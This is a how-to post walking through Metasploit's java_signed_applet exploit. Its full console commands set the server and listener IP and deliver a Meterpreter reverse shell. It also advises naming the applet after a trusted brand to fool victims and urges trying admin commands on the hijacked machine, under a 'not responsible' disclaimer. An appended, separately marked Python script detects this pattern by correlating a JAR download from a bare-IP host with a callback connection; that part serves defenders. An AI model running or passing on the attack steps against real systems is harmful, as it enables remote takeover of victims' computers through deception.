HOWTO METASPLOIT
We open a shell and type:
sudo msfconsole
This program uses exploits to break into another computer; we will use a virtual machine or, in my case, another computer of mine.
We will use this exploit:
use exploit/multi/browser/java_signed_applet
This exploit uses Java, which is present in most web apps.
We have to name the plugin:
set APPLETNAME google
You can name the applet as you wish, but try to use something well-known.
Now you have to set up the server; the server address is our IP. The client will connect to that address. If you don't know your IP, open a shell and type:
sudo ifconfig
I'm connected to the interface wlan0, so my IP is 192.168.1.41.
We go back to the Metasploit shell and type:
set SRVHOST 192.168.1.41
Now the port, the port is usually 80:
set SRVPORT 80
The path:
set URIPATH /
And now we set the payload:
set payload windows/meterpreter/reverse_tcp
Now we have to set the local host, which is our IP too:
set LHOST 192.168.1.41
Now run the exploit:
exploit
And that's all. In the virtual machine, type the IP into the browser.
Then Java will appear:
Then, on our computer, the Metasploit shell will show:
Meterpreter opened in session 1
Or something like that, so we have to type:
sessions -i 1
The number is the ID of the session; it can be 1, 2 or another number. Now you are the admin on that computer, and you can use Windows commands:
shutdown, reboot, regshot....
There are a lot of commands, so you have to try all of them.
I have learned everything with Google and by watching videos. I'm not responsible for what you do with this tutorial.
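Seen from the defender's side, the steps above leave a recognisable pattern: a browser fetches a Java applet from a server addressed by bare IP (SRVHOST), and shortly afterwards the same client opens a TCP connection back to that same IP (LHOST) on a different port. The following is an added example, not part of the original post, that correlates the two events; the log schema, field names, time window and sample records are assumptions constructed for illustration.

```python
import ipaddress
from datetime import datetime, timedelta

JAVA_TYPES = {"application/java-archive", "application/x-java-archive"}
WINDOW = timedelta(seconds=120)  # assumed correlation window

# Constructed sample records in a hypothetical schema (not real logs).
PROXY_LOG = [
    {"ts": "2024-01-01T10:00:00", "client": "192.168.1.50", "host": "192.168.1.41",
     "port": 80, "path": "/google.jar", "ctype": "application/octet-stream"},
    {"ts": "2024-01-01T10:05:00", "client": "192.168.1.51", "host": "repo.example.org",
     "port": 80, "path": "/lib/util.jar", "ctype": "application/java-archive"},
    {"ts": "2024-01-01T10:10:00", "client": "192.168.1.52", "host": "192.168.1.41",
     "port": 80, "path": "/google.jar", "ctype": "application/octet-stream"},
]
CONN_LOG = [
    {"ts": "2024-01-01T10:00:07", "client": "192.168.1.50", "dst": "192.168.1.41", "dport": 4444},
    {"ts": "2024-01-01T10:05:02", "client": "192.168.1.51", "dst": "93.184.216.34", "dport": 443},
    # Same server, but long after the download: outside the window, not correlated.
    {"ts": "2024-01-01T11:30:00", "client": "192.168.1.52", "dst": "192.168.1.41", "dport": 4444},
]

def is_ip_literal(host):
    """True when the HTTP host is a bare IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def is_java_archive(rec):
    """Match on content type or file extension, since servers may mislabel JARs."""
    return rec["ctype"].lower() in JAVA_TYPES or rec["path"].lower().endswith(".jar")

def correlate(proxy_log, conn_log, window=WINDOW):
    """Flag clients that fetch a JAR from a bare-IP host and then connect back to it."""
    alerts = []
    for p in proxy_log:
        if not (is_ip_literal(p["host"]) and is_java_archive(p)):
            continue
        t0 = datetime.fromisoformat(p["ts"])
        for c in conn_log:
            delay = datetime.fromisoformat(c["ts"]) - t0
            if (c["client"] == p["client"] and c["dst"] == p["host"]
                    and c["dport"] != p["port"] and timedelta(0) <= delay <= window):
                alerts.append({"client": p["client"], "server": p["host"], "applet": p["path"],
                               "callback_port": c["dport"], "delay_s": int(delay.total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in correlate(PROXY_LOG, CONN_LOG):
        print(alert)
```

A client that downloads the applet but never connects back (for example because the user declined the Java prompt) produces no alert, which keeps the rule focused on successful execution.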